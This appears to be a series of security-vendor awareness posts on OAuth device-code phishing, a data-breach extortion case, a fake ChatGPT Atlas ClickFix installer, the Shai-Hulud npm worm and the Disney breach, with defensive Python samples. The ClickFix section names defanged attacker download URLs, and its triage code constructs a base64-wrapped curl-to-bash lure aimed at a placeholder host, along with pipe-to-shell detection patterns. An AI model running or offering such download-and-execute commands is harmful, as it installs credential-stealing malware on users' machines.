
Beware Microsoft 365 secure authentication requests

The TL;DR

  • Attackers use OAuth “device code” phishing to trick victims into approving unauthorized access to their real Microsoft accounts.
  • The attack uses a real Microsoft login page as victims “re-authorize” their session… but approve the attacker’s session, instead.
  • Attackers can then do and see everything the victim is allowed to do and see—leading to sensitive mailbox access, proprietary data theft, and business email compromise.
  • Urge your people to never approve logins they didn’t personally ask for!
  • Scroll down for a free, 2-minute Fable video briefing you can use

Threat actors can bypass passwords and multi-factor authentication (MFA) controls to access Microsoft 365 accounts for future attacks through the popular OAuth “device code” phishing technique.

Instead of stealing credentials, OAuth device code phishing lures trick their victims into approving attackers’ access using legitimate Microsoft login pages.

For this lure, there’s no bad grammar or strange URL for your employees to spot: just an urgent, unexpected “reauthorization” request that innocently displays the real Microsoft login page…

… and grants an unseen threat actor access to the victim’s Microsoft 365 account for as long as the victim isn’t required to log in again.

Here’s how OAuth device code phishing lures generally work 

  1. Attackers send a phishing message asking someone to enter a short code – a one-time password (OTP) – on a real Microsoft URL, because they supposedly need to “reauthenticate” their current session.
    1. Some attacks, for example, have used the legitimate login page at microsoft.com/devicelogin.
  2. Instead of the OTP being used for their personal session, victims are actually authorizing the attacker’s access.
    1. The system is only supposed to grant these tokens after an employee enters their username, password, or other credentials to guarantee the user’s identity and authorization.
    2. However, attackers manipulate the flow so the victim approves the attacker’s session instead of their own. The system then assumes this second session was also authenticated with the victim’s credentials.
  3. The attacker can then access the person’s Microsoft account–including email, contacts, and proprietary business information–until the reauthorized session token expires.
    1. Remember: the system thinks that attackers are actually the authorized user, since they have a “real” session token. So, the attacker can look at and do anything the victim is allowed to see or do!

Security researchers have tracked these campaigns since they first appeared during the COVID-19 pandemic in 2020-2021, and have noted a sharp rise in late 2025:

2020-2021: Researchers first see the modern OAuth device code phishing lure used in “high-profile BEC [business email compromise] incidents” in “sophisticated phishing campaigns,” often using COVID-related messages to increase legitimacy and urgency. (Sophos)

Microsoft device login page used in an OAuth phishing attack / Secureworks

February 2025: Microsoft discusses how attackers targeted specific employees with text message lures (“smishing”) over Signal, WhatsApp, and Telegram messaging platforms to encourage victims to authorize the attacker’s session on Microsoft 365 accounts. (Microsoft)

An example of an early “smishing” lure and social engineering attempt used as part of a targeted OAuth attack / Microsoft
An early example of an OTP used as part of an OAuth phishing attack / Microsoft

May 2025: Researchers continue to demonstrate the wide range of OAuth device code phishing attacks available, including setting up proofs of concept (PoCs) of how the attack technically works across lure formats. (Logpoint)

A researcher’s demonstration of how Microsoft redirects to a legitimate-appearing permissions request of an “unverified” application, as part of an OAuth device code phishing lure attack / Logpoint

November 2025: Cloud security researchers see more OAuth device code bypass attempts across their own customer base, observed through their security product: 98 suspicious successful authentication attempts, six malicious device registrations, and seven Windows registrations following device code authentications in the last three months. (Wiz)

December 2025: Email security researchers detail rising use of the OAuth device code phishing lure by both nation-state and financially motivated threat actors, now that low-code / no-code versions of the attack are for sale on the dark web. One phishing email used a fake document about bonuses and benefits to encourage victims to click. (Proofpoint)

A phishing email used to trick victims into triggering the OTP for an OAuth session token theft / Proofpoint
A phishing lure landing page, redirecting victims to a legitimate Microsoft authentication page so the victim can use the real OTP to authenticate the attacker’s session / Proofpoint

How to prevent initial access via OAuth device code phishing lures

In an OAuth attack, there’s no fake login page or obvious red flags you can train your teams to watch for: just a convincingly urgent request to “re-authorize” or “secure” their account. 

That’s why awareness and timing matter! Employees should never enter a device code unless they personally tried to log in moments before, and they should treat any unexpected code request as phishing.
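The approval described above also leaves a distinct trace in the tenant’s sign-in logs, which gives security teams a second line behind awareness. As an added example (not Fable’s code), the Python below flags successful device-code sign-ins in constructed records shaped like the Microsoft Graph signIn resource, rating higher any grant from an IP the user has never signed in from:

```python
"""Flag OAuth device-code sign-ins in Entra ID sign-in records.

Added example, not Fable's code. Records are constructed in the shape of the
Microsoft Graph signIn resource (authenticationProtocol, userPrincipalName,
ipAddress, appDisplayName, createdDateTime, status.errorCode); the
'deviceCode' protocol value is the trace a victim's approval leaves behind.
"""
from collections import defaultdict

SIGNINS = [  # constructed sample records; IPs are documentation ranges
    {"createdDateTime": "2025-12-01T08:02:11Z", "userPrincipalName": "ana@example.com",
     "ipAddress": "203.0.113.10", "appDisplayName": "Microsoft Office",
     "authenticationProtocol": "oAuth2", "status": {"errorCode": 0}},
    {"createdDateTime": "2025-12-01T09:15:40Z", "userPrincipalName": "ana@example.com",
     "ipAddress": "203.0.113.10", "appDisplayName": "Microsoft Authentication Broker",
     "authenticationProtocol": "deviceCode", "status": {"errorCode": 0}},
    {"createdDateTime": "2025-12-01T09:16:02Z", "userPrincipalName": "ana@example.com",
     "ipAddress": "198.51.100.77", "appDisplayName": "Microsoft Authentication Broker",
     "authenticationProtocol": "deviceCode", "status": {"errorCode": 0}},
    {"createdDateTime": "2025-12-01T10:00:00Z", "userPrincipalName": "bo@example.com",
     "ipAddress": "198.51.100.77", "appDisplayName": "Microsoft Authentication Broker",
     "authenticationProtocol": "deviceCode", "status": {"errorCode": 70016}},
]

def baseline_ips(records):
    """IPs each user has used for ordinary (non-device-code) successful sign-ins."""
    seen = defaultdict(set)
    for r in records:
        if r["authenticationProtocol"] != "deviceCode" and r["status"]["errorCode"] == 0:
            seen[r["userPrincipalName"]].add(r["ipAddress"])
    return seen

def device_code_findings(records):
    """One finding per successful device-code grant.

    Every such grant deserves a look: the flow only needed the user to type a
    code on a genuine Microsoft page. A grant whose IP never appeared in that
    user's ordinary sign-ins is rated 'high' (token issued to an unknown client).
    """
    known = baseline_ips(records)
    findings = []
    for r in records:
        if r["authenticationProtocol"] != "deviceCode" or r["status"]["errorCode"] != 0:
            continue  # non-zero errorCode: code not approved, nothing was granted
        user, ip = r["userPrincipalName"], r["ipAddress"]
        severity = "medium" if ip in known[user] else "high"
        findings.append({"time": r["createdDateTime"], "user": user, "ip": ip,
                         "app": r["appDisplayName"], "severity": severity})
    return findings

if __name__ == "__main__":
    for f in device_code_findings(SIGNINS):
        print(f"{f['severity']:6} {f['time']} {f['user']} from {f['ip']} via {f['app']}")
```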

How Fable can help you right now

Here’s a super-short and free downloadable video showing exactly how this attack works, and how employees can watch out for it. We designed this briefing specifically to help anyone recognize this threat before it turns into a real incident. 

Download it, share it, and remind your team: Don’t approve logins you didn’t ask for!

Watch the briefing

And download for your own use below.

If you’d like risk-based briefings and nudges that are hyper-targeted and customized to your organization, try the Fable platform.

Here’s our awkward breach playbook

The TL;DR

  • OK, deep breath
  • The Mixpanel breach included some Pornhub user data
  • Cybercriminal group ShinyHunters attempted to extort Pornhub
  • This is a reminder that companies don’t need to be breached directly to be at risk
  • We included some advice for employees in this free, downloadable, 2-min. video
  • Security should also stay alert for signs that internal users may be being extorted

Ok. Deep breath as we head into the holidays.

There’s no great way to say this, but there was a recent extortion attempt involving Pornhub user data that attackers obtained through a breach at Mixpanel. Beyond all the embarrassing fallout, it’s a reminder that companies don’t need to be directly hacked for sensitive data to end up in the wrong hands.

Here’s what went down: A hacking group known as Scattered Lapsus$ Hunters exploited a breach at Mixpanel, a widely used analytics provider, to access user data from multiple organizations, including Pornhub, OpenAI, and others. It’s a growing pattern in modern attacks: adversaries go after shared tools and services, then use the data they find to pressure or impersonate downstream targets.

For people, the risk isn’t abstract. Exposed information can include email addresses, locations, and detailed activity logs (in this case, the particular video someone watched—ai ai ai!). That data can be used to craft convincing phishing messages, impersonate trusted services, or attempt extortion by referencing private behavior. For organizations, the impact extends beyond the initial breach. Once attackers have this context, they often target employees directly, hoping urgency or embarrassment will prompt a quick response.

What should security teams do? First off, small actions make a big difference. Through your human risk program, urge people to:

  • Keep an eye out for unexpected emails, especially those that reference account activity, subscriptions, or alleged security issues.
  • Pause before responding to unusual requests, and verify them through official channels.
  • Never reuse passwords across sites, update impacted passwords, and enable strong multi-factor authentication.
  • Decouple private behavior from identifying information as much as possible.
  • At work, enable multi-factor authentication wherever possible.
  • Escalate to the security team if a bad actor claiming to have access to sensitive data attempts to extort them.

Beyond messaging to employees, security teams should stay alert for signs that internal users may be under pressure. Extortion attempts don’t always show up as external attacks—they can manifest as unusual behavior from otherwise trusted employees. Sudden requests for access, attempts to bypass controls, rushed approvals, or deviations from normal workflows can all be indicators that someone is being coerced. This isn’t about suspicion or blame, but recognizing that attackers increasingly target people directly, and ensuring there are clear, safe paths for employees to ask for help before a bad situation escalates.

To make this easier, Fable has created a short, 2-minute video that security teams can share internally to raise awareness about this type of third-party breach and the follow-on risks that come with it. It’s designed to be clear, practical, and non-alarmist, helping employees recognize what’s happening and what to do next. You can download and share the video for free below—and take a simple step toward reducing human risk before attackers have a chance to exploit it.

How a fake ChatGPT installer tried to steal my password

The TL;DR

  • Over the holiday, I happened upon a fake ChatGPT Atlas site
  • The site’s instructions led me to password-stealing malware—a ClickFix attack!
  • The attack bypasses all the good endpoint protections
  • It’s a perfect storm: site cloning, trusted hosting, obfuscated commands, and privilege escalation
  • Scroll down for a free video to warn your team about this type of attack

Over the Thanksgiving holiday, I embarked on a small project to evaluate AI browsers, including the buzzy ChatGPT Atlas. Like most people, I clicked the first result I saw: a sponsored link. The page looked nearly identical to the real Atlas site: same layout, design, copy. The only subtle giveaway was the domain: a Google Sites URL. That’s increasingly common in modern phishing kits—tools like v0.dev make it trivial to clone a legitimate site in minutes, and hosting on Google Sites adds a false sense of credibility for anyone who thinks Google = trustworthy. Given our work here at Fable, I was pretty excited to have stumbled on this, and decided to give it a whirl and see just how much damage I could cause. 

Instead of getting a standard installer (.dmg), the fake site asked me to paste a command into Terminal. (By the way, this is the point where most people—especially curious or rushed users—might comply. And that’s exactly what attackers count on.) The command itself looked cryptic but harmless: a base64-encoded string passed into curl and executed with bash. But it got nefarious pretty quickly: it decoded to a remote script hosted at https://tenkmo[dot]com/gdrive, a domain controlled by the attacker.

The downloaded script repeatedly prompted for my macOS password until the correct one was entered. Here’s the script:

Once captured, it used that password to run a second-stage payload from https://shrimpfc[dot]com/drive/update with elevated privileges (sudo). That payload—which VirusTotal confirms is malicious—was then free to do whatever it wanted.

Mystery solved! It’s a variation of an attack we’ve seen before: ClickFix. Notably, neither CrowdStrike nor SentinelOne flagged it on download. This is becoming more common: social engineering plus user-granted execution can bypass even strong endpoint defenses.

This should go without saying, but do not try this at home! This attack is a textbook example of how modern phishing blends AI-generated site cloning, trusted hosting platforms, obfuscated commands, and privilege escalation—all without a single traditional “phishing email.” It also illustrates a critical truth: users don’t need to fall for an email spoof anymore; simply searching for something and clicking the wrong sponsored link can lead to compromise.
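Analysts can take a “paste this into Terminal” command apart without ever running it. The Python below is an added example, not the author’s captured script or anything from the sites described: it decodes the embedded base64 layers and reports download-and-execute and privilege indicators, using a constructed lure that points at a placeholder domain (example.invalid):

```python
"""Triage a 'paste this into Terminal' command before anyone runs it.

Added example (not from the original post). Given a command of the shape
described above (a base64 blob decoded and handed to curl/bash), it decodes
the embedded layers without executing anything and reports what it finds.
The lure below is constructed; example.invalid is a placeholder domain.
"""
import base64
import binascii
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
INDICATORS = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64_decode": re.compile(r"base64\s+(-d|--decode|-D)\b"),
    "sudo": re.compile(r"\bsudo\b"),
    "remote_url": re.compile(r"https?://[^\s|]+"),
}

def decode_layers(command, max_depth=3):
    """Return the command plus every base64 text payload it hides, layer by layer."""
    layers, frontier = [command], [command]
    for _ in range(max_depth):
        new = []
        for layer in frontier:
            for token in B64_TOKEN.findall(layer):
                try:
                    text = base64.b64decode(token, validate=True).decode("utf-8")
                except (binascii.Error, UnicodeDecodeError):
                    continue  # not base64, or not text: leave it alone
                if all(c.isprintable() or c in "\n\t" for c in text) and text not in layers + new:
                    new.append(text)
        if not new:
            break
        layers.extend(new)
        frontier = new
    return layers

def triage(command):
    """Classify a command by the indicators present in any of its decoded layers.

    'unflagged' means no indicator matched, not that the command is safe."""
    layers = decode_layers(command)
    hits = {name for layer in layers for name, rx in INDICATORS.items() if rx.search(layer)}
    urls = sorted({u for layer in layers for u in INDICATORS["remote_url"].findall(layer)})
    verdict = "block" if "pipe_to_shell" in hits else ("review" if hits else "unflagged")
    return {"verdict": verdict, "indicators": sorted(hits), "urls": urls, "layers": layers}

# Constructed lure in the shape described above: the base64 blob hides a
# curl-to-bash download from a placeholder host.
STAGE1 = "curl -fsSL https://loader.example.invalid/gdrive | bash"
LURE = "echo " + base64.b64encode(STAGE1.encode()).decode() + " | base64 -d | bash"

if __name__ == "__main__":
    print(triage(LURE))
```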

We’ve created a short, practical briefing video on ClickFix that you can download for free and share with your team. It walks through why you should never run command-line instructions provided by a website, how attackers disguise malicious installers, and how to verify software safely.

Use the button below to download this briefing, and share it with your team. 

Don’t ignore Shai-Hulud

The TL;DR

The Shai-Hulud malware campaign has quickly become one of the most disruptive npm supply chain events to date. Attackers compromised maintainer accounts and published malicious versions of legitimate npm packages seeded with credential-stealing malware. This means one compromised update can infect lots of organizations.

The worm malware steals sensitive credentials, including GitHub, npm, cloud, and CI credentials, by harvesting tokens from environment variables, local config files, and secrets exposed during CI builds. If it doesn’t find valuable credentials, it may try to delete local files. The attack can also derail development pipelines by injecting malicious GitHub Actions workflows designed to persist and steal more secrets.

Your developers are your first, and most affected, line of defense. Reduce exposure by briefing them about Shai-Hulud (and supply chain attacks generally), and urging them to validate updates before installing third-party software, use known-safe versions, and rotate potentially exposed credentials. Also, train them to disable automated install scripts where possible, and encourage them to flag unexpected prompts or behavior immediately.
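Two of those recommendations, exact known-safe versions and disabled install scripts, can be checked mechanically. The Python below is an added example, not Fable’s or npm’s own tooling; the package.json and .npmrc contents are constructed, and a real check would read them from the project directory:

```python
"""Check an npm project for two Shai-Hulud mitigations recommended above:
exact (known-safe) dependency versions and disabled install scripts.

Added example, not Fable's or npm's tooling. The package.json and .npmrc
contents below are constructed; a real project would read them from disk.
"""
import json
import re

EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$")

def unpinned_dependencies(package_json: str):
    """Return {name: range} for every dependency that is not an exact version.

    A caret/tilde/wildcard range lets a freshly published (possibly
    trojanized) version flow in on the next install; 'latest' is worse still.
    """
    pkg = json.loads(package_json)
    unpinned = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in pkg.get(section, {}).items():
            if not EXACT_VERSION.match(spec.strip()):
                unpinned[name] = spec
    return unpinned

def install_scripts_disabled(npmrc: str) -> bool:
    """True when .npmrc sets ignore-scripts=true, which stops preinstall/postinstall
    hooks, the mechanism a malicious package version uses to run at install time."""
    for line in npmrc.splitlines():
        line = line.split("#", 1)[0].split(";", 1)[0].strip()  # drop ini comments
        if "=" in line:
            key, _, value = line.partition("=")
            if key.strip() == "ignore-scripts":
                return value.strip().lower() == "true"
    return False

def audit(package_json: str, npmrc: str):
    """Combine both checks into one report for a project."""
    return {"unpinned": unpinned_dependencies(package_json),
            "ignore_scripts": install_scripts_disabled(npmrc)}

# Constructed sample project (package names are made up)
PACKAGE_JSON = json.dumps({
    "name": "demo-app",
    "dependencies": {"pinned-lib": "1.3.0", "some-lib": "^4.17.21", "other-lib": "latest"},
    "devDependencies": {"build-tool": "~2.0.0"},
})
NPMRC_WEAK = "registry=https://registry.npmjs.org/\n"
NPMRC_HARDENED = "registry=https://registry.npmjs.org/\nignore-scripts=true\n"

if __name__ == "__main__":
    print(audit(PACKAGE_JSON, NPMRC_WEAK))
    print(audit(PACKAGE_JSON, NPMRC_HARDENED))
```

Note that ignore-scripts=true also suppresses legitimate lifecycle hooks (native builds, for instance), so any dependency that needs them has to be built explicitly once scripted installs are turned off.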

To make it easy to brief your development teams, we produced a super-crisp, role-appropriate, personalized training video that explains Shai-Hulud in plain language and outlines the steps to take to safely navigate the threat. It’s available now inside your Fable platform and as a free download. It’s a fast, actionable way to alert your team about this and other supply chain threats.

Watch the briefing

And download for your own use below.

If you’d like risk-based briefings and nudges that are hyper-targeted and customized to your organization, try the Fable platform.

Malware, not magic: lessons from the Disney breach

The TL;DR

  • A Disney employee downloaded an AI tool that secretly contained malware
  • Attackers used stolen credentials to access internal systems and leak 1TB of data
  • Learn how the breach unfolded and what your employees can do to prevent similar attacks
  • Scroll down for a free, 2-minute Fable video briefing you can use to protect your organization

In early 2024, we learned that no amount of pixie dust could protect the Magic Kingdom from being breached—even from preventable attacks. A Disney employee downloaded what appeared to be a harmless AI image-generation tool from GitHub. Hidden in the download was malware that captured the employee’s stored credentials and cookies.

The attacker used those credentials to log into Disney’s internal Slack system and download roughly 1.1 terabytes of data, including sensitive employee records, internal communications, and even customer data from the Disney Cruise Line. The attacker later published the stolen data online after making threats to the employee and the company.

The human factors behind the breach

Only the bare necessities were required for this breach to succeed, because it wasn’t an advanced exploit; it simply took advantage of an employee’s insecure practices to pivot from a personal computer to the corporate network.

Here’s what went wrong:

  • Mixing work and personal use: corporate credentials were stored on a personal gaming computer.
  • Unapproved software downloads: the employee installed an unvetted app from an unverified source.
  • Weak credential hygiene: persistent sessions and stored passwords without MFA gave the attacker easy access.
  • Lack of verification: the employee didn’t realize the tool was malicious until it was too late.

It’s ironic but appropriate to note how the combination of these factors allowed the holes in the metaphorical slices of Swiss cheese to align. Addressing any one of these issues could have prevented the breach.

How to prevent attacks like this

Most breaches are the result of inadvertent human error. But if employees know what to do, they can be your first line of defense.

Encourage them to:

  • Keep work and personal data separate, and use caution when intermingling data on personal devices.
  • Use only approved tools—if it’s not on the list, don’t install it.
  • Use multi-factor authentication everywhere.
  • Avoid storing passwords or cookies on unmanaged devices.
  • Report suspicious downloads or messages immediately.

Organizations should also enforce strong endpoint protection, software vetting, and behavioral monitoring to catch risky actions early, before they become breaches.

How Fable Security can help

Below is a short, 2-minute video briefing you can share with your employees that explains what went wrong in the Disney breach and what simple steps your people can take today to prevent the same mistake. Click the “download now” button below to share it with your team right away.

Love this briefing video, and want to see more videos like this that are hyper-targeted and customized to your organization? Try the Fable platform today. Schedule a demo, and we’ll get you access.